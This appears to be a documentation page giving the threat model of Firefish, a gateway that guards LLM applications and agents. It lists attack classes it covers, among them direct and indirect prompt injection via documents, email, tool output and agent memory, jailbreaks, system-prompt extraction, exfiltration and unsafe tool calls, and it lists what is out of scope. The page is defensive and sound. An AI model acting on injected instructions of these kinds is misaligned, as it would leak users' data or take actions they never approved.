Firefish docs

Threat Model

Firefish focuses on instruction confusion, data exposure, unsafe tool use, unsafe output, and untrusted context becoming action.

In scope

  • Prompt injection in direct user prompts.
  • Indirect injection in retrieved documents, webpages, PDFs, email, tool output, and agent memory.
  • Jailbreak attempts that ask the model to ignore or override policy.
  • Data exfiltration attempts, including secret-bearing outbound actions.
  • System prompt leakage and hidden-rule disclosure requests.
  • Unsafe tool calls, including write, send, delete, execute, upload, webhook, and external API actions.
  • Unsafe model outputs, including secret leakage and policy-violating completions.
  • Obfuscated malicious instructions, including encoded, spaced, or disguised attack text.

Out of scope

  • Magic perfect model safety. Firefish is a gateway control, not a guarantee that every model will behave perfectly.
  • Replacing AppSec. Teams still need threat modeling, least privilege, secrets management, testing, and incident response.
  • Guaranteeing every model response is true. Firefish is not a factuality oracle.
  • Protecting systems that bypass the gateway. Traffic and tool calls must pass through Firefish to be enforced.